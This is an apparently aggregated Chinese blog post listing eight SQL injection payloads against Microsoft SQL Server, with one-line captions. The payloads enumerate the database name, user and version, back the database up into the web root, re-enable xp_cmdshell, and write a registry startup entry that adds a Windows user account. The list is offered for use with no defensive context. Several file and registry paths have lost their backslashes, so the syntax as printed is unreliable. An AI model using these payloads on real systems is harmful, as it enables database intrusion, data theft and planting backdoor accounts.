2022
我们一起努力
Hi, 请登录     我要注册     找回密码
当前位置:枫舟驿站 文章聚合 正文

sql注入语句有哪些

2023-06-10 分类:文章聚合 阅读(51) 评论(0)

sql注入语句有:

1、返回的是连接的数据库名:

and db_name()>0

2、获取连接用户名:

and user>0

3、将数据库备份到Web目录下面:

;backup database 数据库名 to disk='c:inetpubwwwroot1.db';--

4、显示SQL系统版本:

and 1=(select @@VERSION) 或and 1=convert(int,@@version)--

5、判断xp_cmdshell扩展存储过程是否存在:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

6、恢复xp_cmdshell扩展存储的命令:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:inetputwebxplog70.dll';--

7、向启动组中写入命令行和执行程序:

;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion
Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

8、查看当前的数据库名称:

and 0  db_name(n) n改成0,1,2,3……就可以跨库了 或and 1=convert(int,db_name())--

赞(0)
文章名称:《sql注入语句有哪些》
文章链接:https://www.fzvps.com/83157.html
本站文章来源于互联网,如有侵权,请联系管理删除,本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。
图片版权归属各自创作者所有,图片水印出于防止被无耻之徒盗取劳动成果的目的。

相关推荐

评论 抢沙发

评论前必须登录!

 

互动交流中心

枫舟驿站QQ交流群:762884061
广告赞助联系 QQ :468144452
免费投稿请进软文投稿QQ群 762884061

热门文章

热门标签

YouTube playlist 赚钱(1)申请指南(3)元素高度(1)seo优化排名软件推荐哪些(1)华为云海外节点(3)stratagem怎么样(1)显示器与主机连接线图(6)如何在Win7系统中添加系统启动项(1)淮北地区(1)安全启动(1)阿里云ESSD硬盘(1)腾讯云服务器按量计费(1)兆维机房4层(2)图片和视频优化(1)win(5)ftp服务器阿里云(2)西雅图cdn缓存(1)商业应用(2)桥梁作用(1)range(2)vps链接(8)超频(2)youcompleteme(1)腾讯云服务器2核4G(3)vps90(8)首选便宜VPS(1)河南物理服务器(1)网站空间类型(1)IPv6地址选择(1)搜索类聚seo优化工具(1)优质的网络环境(1)eos域名(1)centos ssh登录慢(1)肉毒素(11)互联网络信息中心(1)美国云服务器cn2(2)林毅夫(1)cc攻击与ddos攻击(2)vps有用吗(1)伯力独立服务器(1)

网站统计

  • 日志总数:160319
  • 评论总数:1
  • 标签总数:111053
  • 最后更新:2024-03-14